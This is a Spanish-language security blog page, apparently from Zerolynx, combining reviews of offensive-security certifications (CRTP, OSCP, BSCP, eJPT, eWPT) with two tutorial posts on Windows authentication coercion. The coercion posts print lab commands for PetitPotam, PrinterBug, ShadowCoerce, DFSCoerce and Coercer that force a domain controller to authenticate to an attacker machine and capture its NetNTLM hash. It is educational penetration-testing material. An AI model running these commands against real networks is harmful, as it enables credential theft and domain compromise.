Análisis de Certificaciones de Ciberseguridad Ofensiva | Parte II

 

En la anterior entrega de Certificaciones de Ciberseguridad Ofensiva, estuvimos hablando sobre eJPT (Junior Penetration Tester) y  eWPT (Web Penetration Tester). Durante la entrega de hoy os contaremos qué otras posibilidades existen respecto a las Certificaciones de Ciberseguridad Ofensiva:

CRTP (Certified Red Team Professional)

Descripción

El CRTP (Certified Red Team Professional) de Altered Security es una certificación de Red Team en la que se evalúa la capacidad de una persona para comprometer entornos de Directorio Activo empresariales.

Público objetivo

Esta certificación está diseñada para personas que buscan adquirir los conocimientos necesarios para llevar a cabo ejercicios de Red Team y auditorías internas de seguridad. Sin embargo, también es una excelente opción para aquellos que simplemente deseen ampliar sus conocimientos en comprometer entornos de Directorio Activo empresariales.

Contenido

• Enumeración de Directorio Activo: enumerar información útil como usuarios, grupos, pertenencia a grupos, equipos, propiedades de usuarios, confianzas, ACL, etc., para mapear rutas de ataque.

• Escalada de privilegios local: escalar privilegios locales en máquinas Windows del dominio objetivo.

• Escalada de privilegios de dominio: descubrir credenciales y sesiones de cuentas administradoras, aplicar técnicas clásicas como Kerberoast y sus variantes, identificar y explotar problemas de delegación, así como aprender a abusar de los privilegios de grupos protegidos.

• Persistencia de dominio: explotar la funcionalidad de Kerberos para persistir con privilegios de administrador de dominio, falsificar tickets para llevar a cabo ataques como "Golden ticket" y "Silver ticket". Subvertir la autenticación a nivel de dominio con técnicas como "Skeleton key" y SSP personalizado.

Formato de examen

El CRTP es un examen de 24 horas que consiste en realizar una auditoría interna en un Directorio Activo desde una máquina Windows y con un usuario de dominio proporcionado. El objetivo del examen es lograr la ejecución de comandos en todas las máquinas, independientemente de si se poseen privilegios de administrador o no. En total, hay 5 máquinas, excluyendo la propia del examinado. Tras realizar la parte práctica, se dispone de 48 horas para enviar el informe.

Precio

Para poder realizar el examen, es necesario adquirir el curso de Altered Security, que ofrece tres opciones diferentes. La opción más asequible tiene un precio de 249$ e incluye 30 días de acceso al laboratorio, acceso de por vida al material del curso y un intento de examen.

La segunda opción tiene un precio de 379$ e incluye 60 días de acceso al laboratorio, acceso de por vida al material del curso y un intento de examen.

La tercera opción tiene un precio de 499$ e incluye 90 días de laboratorio, acceso de por vida al material del curso y un intento de examen.

Existe la posibilidad de adquirir un intento de examen adicional por 99$. Si se desea extender el acceso al laboratorio por 30 días, además de obtener otro intento de examen, es posible hacerlo por 199$.

OSCP (Offensive Security Certified Professional)

Descripción

El OSCP (Offensive Security Certified Professional) es una de las certificaciones más reconocidas en el mundo de la seguridad ofensiva. Es una certificación totalmente práctica con la que se aprenden metodologías de pentesting y el uso de herramientas que vienen incluidas en la distribución Kali Linux.

Público objetivo

Esta certificación no está diseñada para personas que están dando sus primeros pasos en el pentesting, a diferencia de otras como el eJPT. Está dirigida a personas que poseen un conocimiento técnico un poco más avanzado, ya sea a través de experiencia profesional o de haber dedicado tiempo a resolver desafíos en plataformas como TryHackMe o HackTheBox.

Contenido

• Metodologías de pentesting: comprensión de la metodología de hacking ético y pentesting, incluyendo reconocimiento, enumeración, explotación, post-explotación e informes.

• Fundamentos de Linux: conocimiento del sistema operativo Linux, interfaz de línea de comandos y sistema de ficheros.

• Conceptos de Redes: comprensión de protocolos y conceptos de redes, incluyendo TCP/IP, enrutamiento y firewalls.

• Seguridad de Aplicaciones Web: conocimiento de vulnerabilidades en aplicaciones web, incluyendo SQL injection, cross-site scripting (XSS) e inyección de comandos.

• Seguridad de Windows: conocimiento de la seguridad del sistema operativo Windows, incluyendo cuentas de usuario, permisos de ficheros y Directorio Activo.

• Desarrollo de Exploits: conocimiento de técnicas de desarrollo de exploits, incluyendo ingeniería inversa, lenguaje ensamblador y debugging.

• Seguridad Wireless: comprensión de conceptos y vulnerabilidades en redes wireless.

• Criptografía: comprensión de conceptos y técnicas criptográficas, incluyendo cifrado, descifrado y hashing.

Formato de examen

El examen se divide en dos partes: la fase de explotación y la elaboración del informe, cada una con una duración de 24 horas. La evaluación total consta de 100 puntos, siendo necesario obtener al menos 70 para aprobar. Los 100 puntos se dividen de la siguiente manera:

• 60 puntos: 3 máquinas independientes, cada una con una puntuación de 20 puntos. Estos 20 puntos se dividen en 10 por conseguir acceso a la máquina y otros 10 por escalar privilegios y convertirse en administrador/root.

• 40 puntos: entorno de directorio activo con 2 clientes y un controlador de dominio. Solamente se obtienen los puntos si se compromete el directorio activo al completo, sin posibilidad de obtener puntos parciales. Esto quiere decir que se obtienen 40 puntos o ninguno.

Además, aparte de los puntos que se obtengan en el examen, existe la posibilidad de obtener hasta 10 puntos adicionales si se completa lo siguiente:

• 30 máquinas del laboratorio de preparación.

• 80% de los ejercicios de cada categoría.

Precio

Para poder realizar el examen, es necesario adquirir el curso PEN-200 (PWK) de Offensive Security. La opción más barata tiene un precio de 1649$ e incluye 90 días de acceso al laboratorio y un intento de examen.

La suscripción Learn One tiene un precio de 2599$ al año y proporciona acceso al laboratorio por un año, así como dos intentos de examen. 

La suscripción Learn Unlimited tiene un precio de 5499$ al año e incluye todos los cursos de la biblioteca de entrenamiento de OffSec, además de intentos de examen ilimitados.

BSCP (Burp Suite Certified Practitioner)

Descripción

El BSCP (Burp Suite Certified Practitioner) es una certificación creada por los desarrolladores de Burp Suite, que es la herramienta por excelencia del pentesting web. Obtener esta certificación demuestra un conocimiento profundo de vulnerabilidades de aplicaciones web, la mentalidad correcta para explotarlas y, por supuesto, las habilidades necesarias con Burp Suite para llevar a cabo estas acciones.

Público objetivo

Esta certificación tiene un nivel de dificultad alto y está diseñada para personas que quieran dedicarse a pentesting de aplicaciones web de manera profesional. No es necesario poseer anteriormente ninguna certificación de pentesting web para poder adquirir el BSCP, pero es recomendable tener unos conocimientos mínimos sobre el funcionamiento de las aplicaciones web.

Contenido

El contenido de esta certificación son todos los módulos de la academia de PortSwigger:

• Vulnerabilidades del lado del servidor:

• Autenticación

• Path traversal

• Inyección de comandos

• Vulnerabilidades de lógica de negocio

• Revelación de información

• Control de acceso

• Vulnerabilidades de subida de ficheros

• Condiciones de carrera

• Server-side request forgery (SSRF)

• Inyección XXE, SQL y NoSQL

• Testeo de APIs

• Vulnerabilidades del lado del cliente:

• Cross-site scripting (XSS)

• Cross-site request forgery (CSRF)

• Cross-origin resource sharing (CORS)

• Clickjacking

• Vulnerabilidades DOM-based

• WebSockets

Formato de examen

Se dispone de cuatro horas para vulnerar dos aplicaciones web, cada una compuesta por tres fases. En cada fase, se debe identificar una o más vulnerabilidades que deben ser explotadas para avanzar a la siguiente fase.

En la fase 1, se comienza como un usuario no autenticado con el objetivo de escalar a un usuario de bajos privilegios. Después, en la fase 2, se debe escalar a un usuario administrador, y finalmente, en la fase 3, el objetivo es leer un archivo del sistema.

Precio

Cada intento de examen tiene un coste de 89€. A diferencia de otras certificaciones, el BSCP no requiere comprar en conjunto el examen junto con un curso de formación, ya que la formación oficial es la academia de PortSwigger, la cual es gratuita.

Hay que tener en cuenta que para poder realizar el examen es necesario utilizar Burp Suite Professional, que tiene un precio de 449€.

Javier Martín, Analista de Ciberseguridad en Zerolynx.

Coerce | Parte II

 

¡Hola de nuevo a todos! Tal y como prometimos, continuamos con la saga de Coerce y en esta segunda parte seguimos comentando sobre otros RPC vulnerables:

MS-FSRVP

MS-FSRVP Es el Remote Procedure Call relacionado con el protocolo de servidor de archivos remotos VSS. Se utiliza para crear copias de recursos compartidos de archivos en un ordenador remoto y para facilitar a las aplicaciones de copia de seguridad la realización de copias de seguridad coherentes con la aplicación y la restauración de datos en recursos compartidos SMB2.

Cabe destacar que, para poder explotar esta vulnerabilidad, es necesario que el servidor tenga habilitado la característica “Servicio del agente VSS del servidor de archivos”. 

Cabe destacar que Microsoft saco dos parches de seguridad para su corrección el 14 de junio de 2022.

Comprobación

Al igual que en el caso de MS-RPRN, para comprobar utilizamos rpcdump de impacket si el RPC MS-FSRVP se encuentra habilitado:

python3 rpcdump.py @dc.corp.lab | grep 'MS-FSRVP'

Cabe destacar que existen más métodos para comprobar si dicho RPC está habilitado mediante otras herramientas y técnicas.

Explotación

Tras comprobar que el RPC denominado como “MS- FSRVP” está habilitado en la víctima, además de haber comprometido un usuario del dominio mediante otras vías, se procederá a la explotación del mismo mediante una PoC denominada como ShadowCoerce la cual tiene asignada el identificador CVE-2022-30154. 

Así mismo, para comprobar que se fuerza la autenticación correctamente, haremos uso del usuario “bob” con privilegios limitados en el dominio “dc.corp.lab”.

python shadowcoerce.py -d "CORP" -u "bob" -p "<Password>" attack_machine dc.corp.lab

Se puede observar la captura del hash NetNTLM en la herramienta Responder. 

MS-DFSNM

MS-DFSNM es el Remote Procedure Call relacionado con el Sistema de archivos distribuidos (DFS): Protocolo de gestión de espacios de nombres. Proporciona una interfaz RPC para administrar configuraciones DFS. 

Comprobación

Al igual que en el caso de MS-EFSR, haremos uso de la herramienta crackmapexec, a través de la ejecución del módulo “dfscoerce” y mediante el uso usuario “bob” con privilegios limitados en el dominio “dc.corp.lab”, para la comprobación de si el servidor es o no vulnerable, pero esta vez con un usuario del dominio previamente comprometido:

crackmapexec smb dc.corp.lab -d "corp.lab" -u "bob" -p "<Password>" -M dfscoerce

Cabe destacar que existen más métodos para comprobar si dicho RPC está habilitado mediante otras herramientas y técnicas.

Explotación

Tras comprobar que el controlador de dominio es vulnerable, se procederá a la explotación de del mismo mediante una PoC denominada como DFSCoerce la cual fue publicada en junio de 2022.

Así mismo, para comprobar que se fuerza la autenticación correctamente, haremos uso del usuario “bob” con privilegios limitados en el dominio “dc.corp.lab”.

python3 dfscoerce.py -d "CORP" -u "bob" -p "<password>" attack_machine dc.corp.lab

Se puede observar la captura del hash NetNTLM en la herramienta Responder.

Todos para uno y uno para todos

Coercer es una herramienta escrita en python la cual prueba múltiples métodos de realizar una "Coerce Authentication", además de incluir todos los descritos anteriormente.

Tiene tres modos de ejecución, scan, coerce y fuzz.  Un ejemplo de ejecución en modo scan sería el siguiente:

coercer scan -t dc.corp.lab -u "bob" -p "<contraseña>" -d "CORP.LAB"

Un ejemplo de ejecución en modo coerce sería el siguiente:

coercer coerce -l attack_machine -t dc.corp.lab -u "bob" -p "<contraseña>" -d "CORP.LAB"

Cheat Sheet 

                                                                                                                                                            Dimas Pastor, Senior Analyst en Grupo Zerolynx.

Análisis de Certificaciones de Seguridad Ofensiva | Parte I

Las certificaciones juegan un papel crucial en el mundo de la ciberseguridad, cumpliendo dos funciones principales. En primer lugar, ayudan a adquirir conocimientos y habilidades en diversas áreas de la ciberseguridad y, en segundo lugar, proporcionan una manera de demostrar que se poseen esos conocimientos y habilidades. El problema es que, debido a la gran cantidad de certificaciones existentes hoy en día, elegir la adecuada puede resultar complicado.

En este artículo, exploraremos diferentes certificaciones que consideramos como opciones sólidas para aquellos que desean especializarse en el área de la seguridad ofensiva. Todas ellas son totalmente prácticas y su examen simula un escenario real en el que se deben comprometer diversos activos, ya que esta la mejor manera de demostrar que se poseen habilidades técnicas

eJPT (Junior Penetration Tester)

Descripción

La primera certificación de la lista es el eJPT (Junior Penetration Tester), de la entidad INE Security. Se trata de una certificación básica donde se valida que se posean los conocimientos, habilidades y capacidades necesarias para desempeñar el rol de un pentester junior.

Público objetivo

El eJPT es una certificación sencilla pensada para aquellos que se están introduciendo en el mundo del pentesting. Es importante destacar que, aunque se trata de una certificación de dificultad baja, se presupone que los candidatos poseen un conocimiento previo en redes y sistemas operativos.

Contenido

• Metodologías de Evaluación: Encontrar sistemas en una red, identificar puertos abiertos, servicios y extraer información de una compañía de fuentes públicas. 

• Pentesting de Hosts y Redes: Identificar vulnerabilidades en sistemas, identificar y modificar código de exploits, manejo de distintas herramientas como metasploit, realizar pivoting mediante port forwarding, realizar ataques de fuerza bruta y crackeo de hashes.

• Pentesting de Aplicaciones Web: Identificar vulnerabilidades en aplicaciones web, enumerar ficheros y directorios ocultos y explotar vulnerabilidades web como Cross-Site Scripting (XSS) o SQL injection.

• Auditoría de Hosts y Redes: Enumerar información de red y servicios a raíz de archivos encontrados en sistemas objetivo. Además, recopilar información de cuentas de usuario en sistemas objetivo y volcar hashes.

Formato de examen

El examen tiene una duración de 48 horas y consta de 35 preguntas de opción múltiple, cada una con 4 posibles respuestas, junto con un componente práctico de laboratorio. En el laboratorio se proporciona acceso a una máquina Kali Linux conectada a la red objetivo. La finalidad del examen es realizar un pentest de tipo Black Box (Caja Negra) a la red objetivo y a todas las redes internas a las que se tengan acceso durante el laboratorio. Durante la realización del examen, se permite el uso de todos los recursos que se quieran como apoyo. La puntuación del examen se mide en una escala de 100 puntos, siendo necesario alcanzar una calificación igual o superior a 70 para aprobar.

Precio

La opción de presentarse al examen está disponible en la página web de INE Security por 249$. Esta opción incluye dos oportunidades para aprobar el examen con hasta 180 días de diferencia entre los dos.

INE Security también ofrece un curso de preparación para el examen denominado PTS (Penetration Tester Student). Este curso está incluido en el Fundamental Pass, que forma parte de la suscripción estándar de su academia online. La tarifa mensual de suscripción es de 39$, mientras que la anual es de 299$.

eWPT (Web Penetration Tester)

Descripción

El eWPT de INE Security es una certificación de dificultad media que valida que una persona tenga los conocimientos, capacidades y habilidades necesarias para poder desempeñar el trabajo de un pentester más concretamente en aplicaciones web.

Público objetivo

La certificación está dirigida a aquellos con fundamentes básicos en redes, sistemas y pentesting que buscan perfeccionar sus habilidades en pentesting Web. Es adecuada, por ejemplo, para personas que han obtenido una certificación básica de pentesting como el eJPT y desean aumentar sus conocimientos en la parte de Web.

Contenido

• Evaluar con precisión aplicaciones web según las prácticas metodológicas y estándares de la industria, identificando vulnerabilidades conforme a la guía de pruebas de seguridad web de OWASP.

• Extraer información de sitios web mediante técnicas de reconocimiento pasivo y OSINT, así como de los dominios, subdominios y direcciones IP de una organización objetivo.

• Examinar ficheros de metadatos de servidores web en busca de exposición de información y determinar el tipo, versión, tecnologías o frameworks utilizados en una aplicación web.

• Analizar la estructura de aplicaciones web para identificar vectores de ataque potenciales y descubrir archivos y directorios ocultos no accesibles mediante navegación normal.

• Identificar y aprovechar vulnerabilidades derivadas de la implementación incorrecta de métodos HTTP, así como de configuraciones erróneas en servidores web.

• Testear aplicaciones web en busca de credenciales predeterminadas y contraseñas débiles, y sortear mecanismos de autenticación frágiles o rotos.

• Identificar y aprovechar vulnerabilidades en la gestión de sesiones, así como explotar componentes de aplicaciones web vulnerables y desactualizados.

• Realizar ataques de fuerza bruta contra formularios de inicio de sesión y aprovechar vulnerabilidades de inyección de comandos para la ejecución remota de código.

• Identificar y aprovechar vulnerabilidades de XSS reflejado, almacenado, y de inyección SQL, así como vulnerabilidades en gestores de contenidos como por ejemplo WordPress.

Formato de examen

El examen se estructura en dos partes: una práctica y otra de redacción de informe, cada una con una duración de 7 días. En la parte práctica, se proporciona una "carta de compromiso", que es un documento con todos los detalles necesarios para llevar a cabo el examen. Durante esta etapa, se requiere comprometer distintas aplicaciones web.

Precio

La opción de presentarse al examen de la certificación eWPT junto con tres meses de formación está disponible en la página web de INE Security por 599$. No es posible realizar el examen sin adquirir también la formación.

Estad atentos porque próximamente os iremos contando más acerca de las certificaciones de seguridad ofensiva.

Javier Martín, analista de ciberseguridad en Zerolynx.

Coerce | Parte 1

Dentro del entorno de Active Directory, los atacantes recurren a autenticaciones forzadas y estrategias de MitM para llevar a cabo diversas acciones. Es por ello por lo que, en esta ocasión, entraremos en el tema de Coerce Authentication. A lo largo de diferentes posts explicaremos las diferentes formas de realizar esta técnica, además de como enlazarlo con otros ataques para elevar privilegios en un dominio.

“Coerce authentication” es una técnica que, mediante las llamadas a los Remote Procedure Calls (RPC) de Windows, fuerza a un servicio a que se autentique contra una máquina. Mediante esta técnica, un atacante puede forzar a servidor vulnerable a autenticarse contra una máquina controlada por el atacante y de esta forma, llegar a obtener el hash de la contraseña de la cuenta de máquina en formato NetNTLM.

Una cuenta de máquina en redes Windows se refiere a una identidad única asociada a un dispositivo en la red. Las cuentas de máquina son esenciales para establecer la comunicación y la colaboración entre dispositivos dentro de un entorno de red con sistemas operativos Windows.

Una vez obtenido el hash de la cuenta de una máquina, se abren un abanico de posibles técnicas para poder aprovechar esta autenticación para suplantar a la víctima. Parte de la criticidad de esta técnica, radica en que una máquina es la víctima. Por ejemplo, si esta técnica es utilizada contra un controlador de dominio, es posible llegar a comprometer la totalidad del dominio, elevando así la criticidad de dicha técnica.

¿Qué es RPC?

RPC son las siglas de Remote Procedure Call (Llamada a Procedimiento Remoto) la cual, es una forma de comunicación entre procesos (IPC). Esta tecnología permite a las aplicaciones enviarse señales entre sí para realizar una operación.

En los entornos Windows, se hace un uso intensivo de RPC para muchos servicios diferentes, como la programación de tareas, la creación de servicios, la configuración de impresoras, configuración de recursos compartidos, la gestión de datos cifrados almacenados de forma remota, entre otros…

Debido a la naturaleza de RPC como vector remoto, atrae mucha atención desde el punto de vista de la seguridad informática.

Principales RPC Vulnerables 

A continuación, se procede a enumerar los principales RPC vulnerables conocidos para el uso de la técnica “Coerce Authentication”.

Cabe destacar que, para la explotación de dichos RPC, es necesario tener una cuenta de un usuario del domino valida, aunque en el caso del RPC conocido como MS-EFSR, es posible llegar a ejecutarlo sin un usuario.

Para este segundo caso, donde la explotación era de forma anónima, Microsoft sí que ha considerado esto una vulnerabilidad y ha sacado parches de seguridad para su corrección.

MS-RPRN

MS-RPRN es el Remote Procedure Call relacionado con el protocolo de sistema de impresión remoto. 

Print Spooler de Microsoft es un servicio que gestiona los trabajos de impresión y otras tareas relacionadas con la impresión. Un atacante que controle un usuario/ordenador de dominio puede, con una llamada RPC específica, activar el servicio spooler de un objetivo que lo esté ejecutando y hacer que se autentique en un objetivo elegido por el atacante. Este comportamiento está marcado como “Wont Fix” desde Microsoft y está habilitado por defecto en todos los entornos Windows.

Comprobación

Para comprobar si un RPC está habilitado en el equipo de la víctima, se puede hacer uso de la herramienta rpcdump de impacket:

Comando: python3 rpcdump.py @dc.corp.lab | grep ‘MS-RPRN’

  

Cabe destacar que existen más métodos para comprobar si dicho RPC está habilitado mediante otras herramientas y técnicas.

Explotación

Tras comprobar que el RPC denominado como “MS-RPRN” está habilitado en la víctima, además de haber comprometido un usuario del dominio mediante otras vías, se procederá a la explotación del mismo mediante una PoC denominada como Printer Bug o SpoolSample la cual tiene asignada el identificador CVE-2021-34527. 

Así mismo, para comprobar que se fuerza la autenticación correctamente, haremos uso del usuario “bob” con privilegios limitados en el dominio “dc.corp.lab”.

Comando: python3 printerbug.py “CORP/bob:<password> @dc.corp.lab” attack_machine

Tras la explotación de la vulnerabilidad, se ha obtenido el hash netNTLMv2 de la cuenta de máquina del controlador de dominio. 

MS-EFSR

MS-EFSR es el Remote Procedure Call relacionado con el protocolo de sistema de cifrado de ficheros remoto. Realiza operaciones de mantenimiento y gestión de datos cifrados que se almacenan de forma remota y a los que se accede a través de una red y está disponible como interfaz RPC.

Cabe destacar que originalmente este RPC era explotable de forma anónima, sin necesidad de haber comprometido previamente una cuenta de usuario del dominio. Es por ello por lo que Microsoft sacó dos parches de seguridad, tanto el 10 de agosto de 2021, como el 10 de mayo de 2022, los cuales se encargan de arreglar la posibilidad de poder realizar esta técnica sin un usuario del dominio.

Comprobación

En este caso, haremos uso de la herramienta crackmapexec, actualmente conocida como netexec, a través de la ejecución del módulo “petitpotam”, para la comprobación de forma anónima de si el servidor es o no vulnerable:

Comando: crackmapexec smb dc.corp.lab -M petitpotam

Cabe destacar que existen más métodos para comprobar si dicho RPC está habilitado mediante otras herramientas y técnicas.

Explotación

Tras comprobar que el controlador de dominio es vulnerable de forma anónima, se procederá a la explotación de del mismo mediante una PoC denominada como Petit Potam la cual tiene asignada dos identificadores CVE-2021-36942 y CVE-2022-26925.

Para comprobar que se fuerza la autenticación de forma anónima, ejecutaremos la PoC dejando los parámetros de usuario (-u), contraseña (-p) y dominio (-d) vacíos.

Comando: python3 PetitPotam.py -u “” -p “” -d “” attack_machine dc.corp.lab

Se puede observar la captura del hash NetNTLM en la herramienta Responder.

En futuras entregas continuaremos hablando de otros RPC vulnerables, ¡Hasta la próxima! ¡Agur!

Dimas Pastor, Senior Analyst en Grupo Zerolynx.